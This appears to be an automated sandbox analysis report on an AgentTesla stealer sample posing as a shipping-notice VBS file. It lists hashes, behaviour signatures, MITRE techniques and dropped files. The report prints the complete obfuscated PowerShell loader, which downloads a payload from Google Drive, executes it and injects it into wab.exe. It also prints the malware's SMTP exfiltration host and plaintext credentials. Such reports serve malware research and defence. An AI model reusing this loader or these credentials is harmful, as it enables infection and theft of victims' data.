agenttesla | 8ff040052385f28e6bb5816a637feb7d3ba1a73ea39f8cd2c16c1450dfc35c3b

General

Target

Arrival Notice PUS_pdf.vbs
Size

278KB
MD5

addc13066aacdb6cdb21ae368bce83d2
SHA1

d4d509e48e946e01605df86bfebf8f4cbc4648f7
SHA256

9c8fb0ee8d5a21346a7e25567abd4155c543d90a213a40d79269d1c4d3b269be
SHA512

3d2af55642e92757e01562ff29b34bf73024aea9bec39a667ca70ab8f5570b35252b27c9ae18202a7ed6800e71e58fe3bf6179627cdba8a5c9602cb24762901e
SSDEEP

6144:LQdAYDLBLW+8A1ytW3xrbjsSFuHeEC57kdmXl45zaoGGqAP3MQ9scOKv8vfuaF+j:EnS2Imw1lRpz

Score

10^/10

agenttesla keylogger spyware stealer trojan

Malware Config

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
mail.myhydropowered.com
Port:
587
Username:
[email protected]
Password:
q5NHtWyc5WKhunX
Email To:
[email protected]

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Blocklisted process makes network request 3 IoCs

flow	pid	Process
3	1728	WScript.exe
7	2580	powershell.exe
9	2580	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
6	drive.google.com
7	drive.google.com
11	drive.google.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
15	api.ipify.org
16	api.ipify.org
17	ip-api.com

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
2768	wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2952	powershell.exe
2768	wab.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2952 set thread context of 2768	2952	powershell.exe	35

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
2580	powershell.exe
2952	powershell.exe
2952	powershell.exe
2768	wab.exe
2768	wab.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2952	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2580	powershell.exe
Token: SeDebugPrivilege	2952	powershell.exe
Token: SeDebugPrivilege	2768	wab.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2768	wab.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 1728 wrote to memory of 2580	1728	WScript.exe	29
PID 1728 wrote to memory of 2580	1728	WScript.exe	29
PID 1728 wrote to memory of 2580	1728	WScript.exe	29
PID 2580 wrote to memory of 2452	2580	powershell.exe	31
PID 2580 wrote to memory of 2452	2580	powershell.exe	31
PID 2580 wrote to memory of 2452	2580	powershell.exe	31
PID 2580 wrote to memory of 2952	2580	powershell.exe	33
PID 2580 wrote to memory of 2952	2580	powershell.exe	33
PID 2580 wrote to memory of 2952	2580	powershell.exe	33
PID 2580 wrote to memory of 2952	2580	powershell.exe	33
PID 2952 wrote to memory of 2652	2952	powershell.exe	34
PID 2952 wrote to memory of 2652	2952	powershell.exe	34
PID 2952 wrote to memory of 2652	2952	powershell.exe	34
PID 2952 wrote to memory of 2652	2952	powershell.exe	34
PID 2952 wrote to memory of 2768	2952	powershell.exe	35
PID 2952 wrote to memory of 2768	2952	powershell.exe	35
PID 2952 wrote to memory of 2768	2952	powershell.exe	35
PID 2952 wrote to memory of 2768	2952	powershell.exe	35
PID 2952 wrote to memory of 2768	2952	powershell.exe	35
PID 2952 wrote to memory of 2768	2952	powershell.exe	35

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Arrival Notice PUS_pdf.vbs"
1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1728
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Klervske = 1;$Hengivnes='Substrin';$Hengivnes+='g';Function Banuyo17($Kolonihaves){$Paraglossia=$Kolonihaves.Length-$Klervske;For($Grazer=5; $Grazer -lt $Paraglossia; $Grazer+=(6)){$Fradrage249+=$Kolonihaves.$Hengivnes.Invoke($Grazer, $Klervske);}$Fradrage249;}function decoupled($Calorically){& ($Sommerperioden) ($Calorically);}$Brodfrs=Banuyo17 'B mbeMstillor,kalzRehoniGematlLacerlMatria asse/ P.oc5Klods.Sy.sl0Azotu prore( BjerWBuskaiUfejlnLigkad,yclooUdstawRessosStarn Cran,NArbejTKisse Depe1Kv te0Incre.O lys0 Nove; H na pathoWScrobiBndlenLoved6A.skr4Ma.ne;For a PresixOblig6Imper4Uophr;Fejlb KvalirShiitvTinct: Gru 1Carro2Le,kb1Diasy. Demu0Smi g) skin RumplGEnosteSolitc Fo hkCyma,o Blnd/Paape2H.rsk0 Doze1 ofma0Tasti0Unbad1Distr0Odont1Vag,e TosseFBrohoi Semir,yvsteBrnesf SkiroVelsexExuld/Bevis1Ujaev2Samos1Exter.Thwac0Sees ';$Stenotaphrum=Banuyo17 'Trbl,UKomplsStatseSmaalr Hj,o-Det,uALovfog ,asteForomn Un ntGreg ';$Amputationer=Banuyo17 'Sederh Ar.dtFremsttredip.luklsGalde: Ansk/Fr.ml/AntiadKvster MandiFripavSati.eG.lio. SikkgSeb soByto,oMaximgNontelBal ieEinar.SyntacArb.jo ,gebmBalda/InterugonofcOvera?TakeueUvistxKvit,pR,maioindberTranst Pree=CaissdPosteoBowlewCorn,n SteelUns.loMatera Boncd Besi&O erfiUnburdSynta=Prten1,aghuoPars lMelonGImper4underRSho.t0ExcurHtang,LUntrejAut eL,aben5Astho0Ton.dh u,viYGodkevMel eD IncruCylinsI.olaEUrtep_DistrSHyperTAfl s-KulbrCScrevKHugorhThermKImperIPadd r Db.f- FrasD.vervRNo,ar ';$Laservid=Banuyo17 'Mili.>.nten ';$Sommerperioden=Banuyo17 'Ga boiFor.seForndxV ars ';$pseudonitrosite = Banuyo17 'Bru,eeCr.chc P.coh.odomo.kuds Afsni%Sol,eaRe.sepUnderpTruand.icebaSavortSectiaUnder%Hangm\Ene gASkotjuSystesWopudt SprorAllosaIndsklPremiiGigg.a balln forssAmygd. AlsiHNormtoSt rmvCorka Chond& Sk u& Stan Sp,see Orn,cErhvehmonaroTerep .epu$ Coal ';decoupled (Banuyo17 'Overk$Kkkeng J,gelLivsooUd,tibSleepaphotolBarda:NewsdF Os.auMultilFe.tud TyphmTamaraKlaveaEllipnForsteParalrOptag=Stran(,torkc,anghmRea tdNerve Skunk/BrrencIndl Langb$UndulpIndh sPr.oceOrganuhemlidAust oLokalnTerroi ImmatTrombrR.dimoCon,es Lig i McmutdknaveMotor)Inds ');decoupled (Banuyo17 ',rnsk$F,stegSili lSaksnoPr.blbAghanaBeseelTriak:StaffBD wcooGallftGngerr undey CecelKo,gelEmotii.appedSnakea K ajeU.ret=Uddel$fyrinA,lutmm.osimpFra auBekentSubdeaCostltIndpoiCholaoSemiwnOpstaeBuffer Unsy.CommissynkrpMaterl PolliFlight Scra( Fusi$Fr igLlnsuma Cir.s MetaeKunstrModerv OptaibirgidFinge)Bidra ');$Amputationer=$Botryllidae[0];decoupled (Banuyo17 ',lyve$Ek,orgMiswrlTherioPlenubFedtiaLfterlTexti: temKFiskerIsocyeOvergm ubee Parar KicheDyna tOpspa= SvigNSvin,efibe,w Port-KrakeO urtzbhypopjGa,eke Unvocprfert Bulb sl,ghSDiscoy errasShanktErhere Ma gmSmert.DubioNHaworePrototSliv.. rojWFeneseKv,enb ,uriCMyreulStudei PrsteBssemnBogomtBeby ');decoupled (Banuyo17 'Arbej$JenirKStjerrbegiteBarsemHaandeudsidrMrke.e Fordtjunki.lensaHNovemeDiakoaSam ndDrawbepub.ir BrdssTreet[Hyper$AnspoS offetRemineStil,nFrilsoBolt tForlaaGrounp Pse,hopregr ExhauCubi.m ,occ]Under=Udkla$Uds.yBChinkr EpidoBear.d S.nufRaffir,recas Info ');$Dandy=Banuyo17 'CalvrKFremtrDaab,eDri,hm agneegtefor AcqueTusintro,an. A,icD UdsaospektwUlt,an VelolMo,dno,oniraFlattd ReasFMlke.iKlarhlSelv eDelag(Sero,$ BysbAIncogm SprupVaskeuFodertRets ablacktUreosiCholuoStepdnIlyapeUnbl,rHuara,Quaif$ ngrasNautieCuratmjuvaviReminp Ne,brBenedoSprjtv ,ermeUnsynn Ulis) .ope ';$Dandy=$Fuldmaaner[1]+$Dandy;$semiproven=$Fuldmaaner[0];decoupled (Banuyo17 'almo,$BrevagneighlSpa robruntbLithoaRegralPulld:BureaUUnsymnundoudAf ameProgrrDemeas UnretForb.eKo,temStatsm D.rge TilsnFabri=Natur(.itioTPrei,eBricks Vi etMolek-DespoPso,edaHeatithofteh Lido Guess$Ph llsUnchre AssomGenneiGer.ipcrimsrSt,ngo Vaa,vtrreheStor,nhavne)Overe ');while (!$Understemmen) {decoupled (Banuyo17 'Tilgo$svigeg starl sko o EvadbArariaAgurkl rets:tri oNclo.pa Twirs Sm,dtRegioiSprogeEnergs.orgatMistr=Indef$StenttReklarDialeuCherueBh is ') ;decoupled $Dandy;decoupled (Banuyo17 'T,gseSMeto.tHyperaPre.erFrisktC,alm-MacroSS,inelBesseeGuth,eUnfurpTaler My.l4Phase ');decoupled (Banuyo17 ' Card$Unsipgprdikl I.peo T,efb binaaH.sdel le s: GlasUSweetnOnerodO erheFjendrReprosProvetPalpaeAlit.mM.stim u.ele.deelnLeven= Hj f(InestTProgreUdenos FrsttTilsl- C ilPWraina Pod tSvipthRoere s bcy$M.untsOesopeBombamRubini OutdpImpolrSb,booRhiz.vMalere R conArkad)Liban ') ;decoupled (Banuyo17 'Coun $Bruttg.ommel ,ardo Ess,bIagttaCelebl Domi:DiamoTdithirTineauIndklgD koleEghj,nMatriePommesOitic=Semi.$Acce,gGarrolBo,dhoCalmsbFunktaW,llilAmimi: Ls,iSAkup aKonkumOverls,yttesD.kup+ Fina+darwi%Sooge$EyingBCheboo MemotInb orInd ey Wedgl Fa.il Lu.ti IncidP,ecea ConfeTrihy.SkrigcMesitoAf,enu PagonStutftBevel ') ;$Amputationer=$Botryllidae[$Trugenes];}decoupled (Banuyo17 'Compu$Multig .ydalPremioNinjab scataKuglelP rfe:Pew.nNAngreaMezenz ImpeaDaah r,apani IlsetUnemai AporsRe tomTappi Cell =Cykel RegleGE,igoeFor.ut Rev.-MattiCManu oRottinunh,ct IdioeindusnBinaetResyn ,akul$Kontasend.ge Vil.m Sal.iKautipFialer KonfoAm.unvBolsteBagsdn Whi, ');decoupled (Banuyo17 'Milit$DdssygDjthalRgelsoDualmbS.arcaAuxollBroch:SlgtnViteruvT nfoeoverctBellas G ab Haver=Forh, Udbri[UndslSChittyteksts P.eatKogekeNo.com Tids.SquamCBr,ndoExternStatevNordseM,ssirEjendt Auto]No me:Lumba:SorbuF GstfrCaly.oFortrmNavneBKdfula Unbrs OutgeOo,on6 ate4 PhreSSmu,st MoldrKloakiAlimenSavarg Uroc(Svovl$ BracNI fikaPacanz ubea T anrdildeiAffectB,odaiJ,rvis UsikmGets.)Fejld ');decoupled (Banuyo17 'Passa$ B,angHaimal elfloUdradbJessea EngolVirus:HemauOUdenovPettiePleskr Synss,fterl RetraWind,cDatalk rosk Stri.= Te,o Supra[LsengS.icroy ubves to.atSletheOrchimFestl. SpisThuskeei.fanxBolewtS,ovf.UncivEOvertnRewe,cFaktooStatsdAttesi GlipnShawngTppef] C,bm:P.ede: aturASunstS gin,C dereI T.skICarth.MisauG RodeeUpshotHuskaSGroott.illirEuromiImpisnhennegHal,p(Fortr$ P,liV PorcvbaryleLydset Vests Grun)Metab ');decoupled (Banuyo17 'Syvaa$ PrudgacronlSurinoDigambImp ga irkelAgate:BendaBLo.giuR,erlr MitinSammefUnrusiBerggrSupereNonem=Nymph$FirblO Bes,vFork,eLums.r TiewsinduslR wina.nmelcStempk her .ume.dsFryt,u astb V,rms F,retLmb.rrSkamfi umbonAs,ongParei(Ic nh3Bl,dp0toptr5Fil.p7Priva0Folke6Linie,Painf2kalib9Fleet9Super6C,rom1Dinne)Tack. ');decoupled $Burnfire;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2580
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Australians.Hov && echo $"
    3⤵
    PID:2452
- - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Klervske = 1;$Hengivnes='Substrin';$Hengivnes+='g';Function Banuyo17($Kolonihaves){$Paraglossia=$Kolonihaves.Length-$Klervske;For($Grazer=5; $Grazer -lt $Paraglossia; $Grazer+=(6)){$Fradrage249+=$Kolonihaves.$Hengivnes.Invoke($Grazer, $Klervske);}$Fradrage249;}function decoupled($Calorically){& ($Sommerperioden) ($Calorically);}$Brodfrs=Banuyo17 'B mbeMstillor,kalzRehoniGematlLacerlMatria asse/ P.oc5Klods.Sy.sl0Azotu prore( BjerWBuskaiUfejlnLigkad,yclooUdstawRessosStarn Cran,NArbejTKisse Depe1Kv te0Incre.O lys0 Nove; H na pathoWScrobiBndlenLoved6A.skr4Ma.ne;For a PresixOblig6Imper4Uophr;Fejlb KvalirShiitvTinct: Gru 1Carro2Le,kb1Diasy. Demu0Smi g) skin RumplGEnosteSolitc Fo hkCyma,o Blnd/Paape2H.rsk0 Doze1 ofma0Tasti0Unbad1Distr0Odont1Vag,e TosseFBrohoi Semir,yvsteBrnesf SkiroVelsexExuld/Bevis1Ujaev2Samos1Exter.Thwac0Sees ';$Stenotaphrum=Banuyo17 'Trbl,UKomplsStatseSmaalr Hj,o-Det,uALovfog ,asteForomn Un ntGreg ';$Amputationer=Banuyo17 'Sederh Ar.dtFremsttredip.luklsGalde: Ansk/Fr.ml/AntiadKvster MandiFripavSati.eG.lio. SikkgSeb soByto,oMaximgNontelBal ieEinar.SyntacArb.jo ,gebmBalda/InterugonofcOvera?TakeueUvistxKvit,pR,maioindberTranst Pree=CaissdPosteoBowlewCorn,n SteelUns.loMatera Boncd Besi&O erfiUnburdSynta=Prten1,aghuoPars lMelonGImper4underRSho.t0ExcurHtang,LUntrejAut eL,aben5Astho0Ton.dh u,viYGodkevMel eD IncruCylinsI.olaEUrtep_DistrSHyperTAfl s-KulbrCScrevKHugorhThermKImperIPadd r Db.f- FrasD.vervRNo,ar ';$Laservid=Banuyo17 'Mili.>.nten ';$Sommerperioden=Banuyo17 'Ga boiFor.seForndxV ars ';$pseudonitrosite = Banuyo17 'Bru,eeCr.chc P.coh.odomo.kuds Afsni%Sol,eaRe.sepUnderpTruand.icebaSavortSectiaUnder%Hangm\Ene gASkotjuSystesWopudt SprorAllosaIndsklPremiiGigg.a balln forssAmygd. AlsiHNormtoSt rmvCorka Chond& Sk u& Stan Sp,see Orn,cErhvehmonaroTerep .epu$ Coal ';decoupled (Banuyo17 'Overk$Kkkeng J,gelLivsooUd,tibSleepaphotolBarda:NewsdF Os.auMultilFe.tud TyphmTamaraKlaveaEllipnForsteParalrOptag=Stran(,torkc,anghmRea tdNerve Skunk/BrrencIndl Langb$UndulpIndh sPr.oceOrganuhemlidAust oLokalnTerroi ImmatTrombrR.dimoCon,es Lig i McmutdknaveMotor)Inds ');decoupled (Banuyo17 ',rnsk$F,stegSili lSaksnoPr.blbAghanaBeseelTriak:StaffBD wcooGallftGngerr undey CecelKo,gelEmotii.appedSnakea K ajeU.ret=Uddel$fyrinA,lutmm.osimpFra auBekentSubdeaCostltIndpoiCholaoSemiwnOpstaeBuffer Unsy.CommissynkrpMaterl PolliFlight Scra( Fusi$Fr igLlnsuma Cir.s MetaeKunstrModerv OptaibirgidFinge)Bidra ');$Amputationer=$Botryllidae[0];decoupled (Banuyo17 ',lyve$Ek,orgMiswrlTherioPlenubFedtiaLfterlTexti: temKFiskerIsocyeOvergm ubee Parar KicheDyna tOpspa= SvigNSvin,efibe,w Port-KrakeO urtzbhypopjGa,eke Unvocprfert Bulb sl,ghSDiscoy errasShanktErhere Ma gmSmert.DubioNHaworePrototSliv.. rojWFeneseKv,enb ,uriCMyreulStudei PrsteBssemnBogomtBeby ');decoupled (Banuyo17 'Arbej$JenirKStjerrbegiteBarsemHaandeudsidrMrke.e Fordtjunki.lensaHNovemeDiakoaSam ndDrawbepub.ir BrdssTreet[Hyper$AnspoS offetRemineStil,nFrilsoBolt tForlaaGrounp Pse,hopregr ExhauCubi.m ,occ]Under=Udkla$Uds.yBChinkr EpidoBear.d S.nufRaffir,recas Info ');$Dandy=Banuyo17 'CalvrKFremtrDaab,eDri,hm agneegtefor AcqueTusintro,an. A,icD UdsaospektwUlt,an VelolMo,dno,oniraFlattd ReasFMlke.iKlarhlSelv eDelag(Sero,$ BysbAIncogm SprupVaskeuFodertRets ablacktUreosiCholuoStepdnIlyapeUnbl,rHuara,Quaif$ ngrasNautieCuratmjuvaviReminp Ne,brBenedoSprjtv ,ermeUnsynn Ulis) .ope ';$Dandy=$Fuldmaaner[1]+$Dandy;$semiproven=$Fuldmaaner[0];decoupled (Banuyo17 'almo,$BrevagneighlSpa robruntbLithoaRegralPulld:BureaUUnsymnundoudAf ameProgrrDemeas UnretForb.eKo,temStatsm D.rge TilsnFabri=Natur(.itioTPrei,eBricks Vi etMolek-DespoPso,edaHeatithofteh Lido Guess$Ph llsUnchre AssomGenneiGer.ipcrimsrSt,ngo Vaa,vtrreheStor,nhavne)Overe ');while (!$Understemmen) {decoupled (Banuyo17 'Tilgo$svigeg starl sko o EvadbArariaAgurkl rets:tri oNclo.pa Twirs Sm,dtRegioiSprogeEnergs.orgatMistr=Indef$StenttReklarDialeuCherueBh is ') ;decoupled $Dandy;decoupled (Banuyo17 'T,gseSMeto.tHyperaPre.erFrisktC,alm-MacroSS,inelBesseeGuth,eUnfurpTaler My.l4Phase ');decoupled (Banuyo17 ' Card$Unsipgprdikl I.peo T,efb binaaH.sdel le s: GlasUSweetnOnerodO erheFjendrReprosProvetPalpaeAlit.mM.stim u.ele.deelnLeven= Hj f(InestTProgreUdenos FrsttTilsl- C ilPWraina Pod tSvipthRoere s bcy$M.untsOesopeBombamRubini OutdpImpolrSb,booRhiz.vMalere R conArkad)Liban ') ;decoupled (Banuyo17 'Coun $Bruttg.ommel ,ardo Ess,bIagttaCelebl Domi:DiamoTdithirTineauIndklgD koleEghj,nMatriePommesOitic=Semi.$Acce,gGarrolBo,dhoCalmsbFunktaW,llilAmimi: Ls,iSAkup aKonkumOverls,yttesD.kup+ Fina+darwi%Sooge$EyingBCheboo MemotInb orInd ey Wedgl Fa.il Lu.ti IncidP,ecea ConfeTrihy.SkrigcMesitoAf,enu PagonStutftBevel ') ;$Amputationer=$Botryllidae[$Trugenes];}decoupled (Banuyo17 'Compu$Multig .ydalPremioNinjab scataKuglelP rfe:Pew.nNAngreaMezenz ImpeaDaah r,apani IlsetUnemai AporsRe tomTappi Cell =Cykel RegleGE,igoeFor.ut Rev.-MattiCManu oRottinunh,ct IdioeindusnBinaetResyn ,akul$Kontasend.ge Vil.m Sal.iKautipFialer KonfoAm.unvBolsteBagsdn Whi, ');decoupled (Banuyo17 'Milit$DdssygDjthalRgelsoDualmbS.arcaAuxollBroch:SlgtnViteruvT nfoeoverctBellas G ab Haver=Forh, Udbri[UndslSChittyteksts P.eatKogekeNo.com Tids.SquamCBr,ndoExternStatevNordseM,ssirEjendt Auto]No me:Lumba:SorbuF GstfrCaly.oFortrmNavneBKdfula Unbrs OutgeOo,on6 ate4 PhreSSmu,st MoldrKloakiAlimenSavarg Uroc(Svovl$ BracNI fikaPacanz ubea T anrdildeiAffectB,odaiJ,rvis UsikmGets.)Fejld ');decoupled (Banuyo17 'Passa$ B,angHaimal elfloUdradbJessea EngolVirus:HemauOUdenovPettiePleskr Synss,fterl RetraWind,cDatalk rosk Stri.= Te,o Supra[LsengS.icroy ubves to.atSletheOrchimFestl. SpisThuskeei.fanxBolewtS,ovf.UncivEOvertnRewe,cFaktooStatsdAttesi GlipnShawngTppef] C,bm:P.ede: aturASunstS gin,C dereI T.skICarth.MisauG RodeeUpshotHuskaSGroott.illirEuromiImpisnhennegHal,p(Fortr$ P,liV PorcvbaryleLydset Vests Grun)Metab ');decoupled (Banuyo17 'Syvaa$ PrudgacronlSurinoDigambImp ga irkelAgate:BendaBLo.giuR,erlr MitinSammefUnrusiBerggrSupereNonem=Nymph$FirblO Bes,vFork,eLums.r TiewsinduslR wina.nmelcStempk her .ume.dsFryt,u astb V,rms F,retLmb.rrSkamfi umbonAs,ongParei(Ic nh3Bl,dp0toptr5Fil.p7Priva0Folke6Linie,Painf2kalib9Fleet9Super6C,rom1Dinne)Tack. ');decoupled $Burnfire;"
    3⤵
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2952
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Australians.Hov && echo $"
      4⤵
      PID:2652
  - - C:\Program Files (x86)\windows mail\wab.exe
      "C:\Program Files (x86)\windows mail\wab.exe"
      4⤵
      Suspicious use of NtCreateThreadExHideFromDebugger
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:2768

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
6b05b16d3c112b8a92f7c0425ad2e7fd

SHA1
949597731dcf75c7fa935ac9ba0d8b78734b3334

SHA256
def3b4e91d729e111f7e7d5729f4bc3e64f1524e485881d5137d63ec6fdb8599

SHA512
c9b694fe974513bc8452234f1387c998abfe17d26365f98aed09cbb8516b068495c67bd3a09b63628a5e244ad2c82bd9b4510e08a348f2b2dc515da478affa9b

Download Submit
C:\Users\Admin\AppData\Roaming\Australians.Hov

Filesize
437KB

MD5
6c03450b7df387c19d5c8b35a16df0f2

SHA1
931d81d4308b4bc4963720b7c241ab99cb5f7f75

SHA256
49f59f2297bec5b10c4b085dc130bb75bb7dc06e71d74d333663365df8a5c65d

SHA512
c1160590583ca0381bb07360d7b328e552bf8ede681616283394aa254c4011a09c1f86f760fa9e62c31ab3fc2f9ab083e5bfdd24178ef84d4afc2582caa400a1

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7HJFDZ4TD428XLDBB9YG.temp

Filesize
7KB

MD5
2e7bd01e74d8464726ddac968eb16d1c

SHA1
c99f009331acb5b04f71fc900d62a198b4964d0f

SHA256
c33723e0e50a4a5694ec85b422f4710363fb3756980aece8cbd56e8eea7bee0e

SHA512
b00ca9ea5c39843d973fcf99245103202d52b4bca70a1abe4b70875fedbdebcd31866631bee33bd1c8ec830c8476d072793df6b65ebf30a2d680ff27afe88c7b

Download Submit
memory/2580-26-0x0000000002930000-0x00000000029B0000-memory.dmp

Filesize
512KB

Download
memory/2580-41-0x0000000002930000-0x00000000029B0000-memory.dmp

Filesize
512KB

Download
memory/2580-22-0x0000000002710000-0x0000000002718000-memory.dmp

Filesize
32KB

Download
memory/2580-25-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

Filesize
9.6MB

Download
memory/2580-23-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

Filesize
9.6MB

Download
memory/2580-21-0x000000001B6B0000-0x000000001B992000-memory.dmp

Filesize
2.9MB

Download
memory/2580-43-0x0000000002930000-0x00000000029B0000-memory.dmp

Filesize
512KB

Download
memory/2580-81-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

Filesize
9.6MB

Download
memory/2580-24-0x0000000002930000-0x00000000029B0000-memory.dmp

Filesize
512KB

Download
memory/2580-39-0x0000000002930000-0x00000000029B0000-memory.dmp

Filesize
512KB

Download
memory/2580-38-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

Filesize
9.6MB

Download
memory/2580-27-0x0000000002930000-0x00000000029B0000-memory.dmp

Filesize
512KB

Download
memory/2768-82-0x0000000023400000-0x0000000023440000-memory.dmp

Filesize
256KB

Download
memory/2768-80-0x000000006F190000-0x000000006F87E000-memory.dmp

Filesize
6.9MB

Download
memory/2768-79-0x0000000000F10000-0x0000000000F52000-memory.dmp

Filesize
264KB

Download
memory/2768-85-0x000000006F190000-0x000000006F87E000-memory.dmp

Filesize
6.9MB

Download
memory/2768-78-0x00000000778C0000-0x0000000077996000-memory.dmp

Filesize
856KB

Download
memory/2768-77-0x0000000000F10000-0x0000000001F72000-memory.dmp

Filesize
16.4MB

Download
memory/2768-86-0x0000000023400000-0x0000000023440000-memory.dmp

Filesize
256KB

Download
memory/2768-56-0x0000000000F10000-0x0000000001F72000-memory.dmp

Filesize
16.4MB

Download
memory/2768-49-0x00000000776D0000-0x0000000077879000-memory.dmp

Filesize
1.7MB

Download
memory/2768-50-0x00000000778F6000-0x00000000778F7000-memory.dmp

Filesize
4KB

Download
memory/2768-51-0x00000000778C0000-0x0000000077996000-memory.dmp

Filesize
856KB

Download
memory/2952-32-0x0000000073710000-0x0000000073CBB000-memory.dmp

Filesize
5.7MB

Download
memory/2952-48-0x00000000778C0000-0x0000000077996000-memory.dmp

Filesize
856KB

Download
memory/2952-46-0x00000000776D0000-0x0000000077879000-memory.dmp

Filesize
1.7MB

Download
memory/2952-45-0x0000000002F00000-0x0000000002F40000-memory.dmp

Filesize
256KB

Download
memory/2952-44-0x0000000073710000-0x0000000073CBB000-memory.dmp

Filesize
5.7MB

Download
memory/2952-42-0x0000000005520000-0x0000000005521000-memory.dmp

Filesize
4KB

Download
memory/2952-40-0x00000000065A0000-0x000000000C15E000-memory.dmp

Filesize
91.7MB

Download
memory/2952-37-0x0000000002F00000-0x0000000002F40000-memory.dmp

Filesize
256KB

Download
memory/2952-34-0x0000000073710000-0x0000000073CBB000-memory.dmp

Filesize
5.7MB

Download
memory/2952-35-0x0000000002F00000-0x0000000002F40000-memory.dmp

Filesize
256KB

Download
memory/2952-33-0x0000000002F00000-0x0000000002F40000-memory.dmp

Filesize
256KB

Download

Analysis

Sharing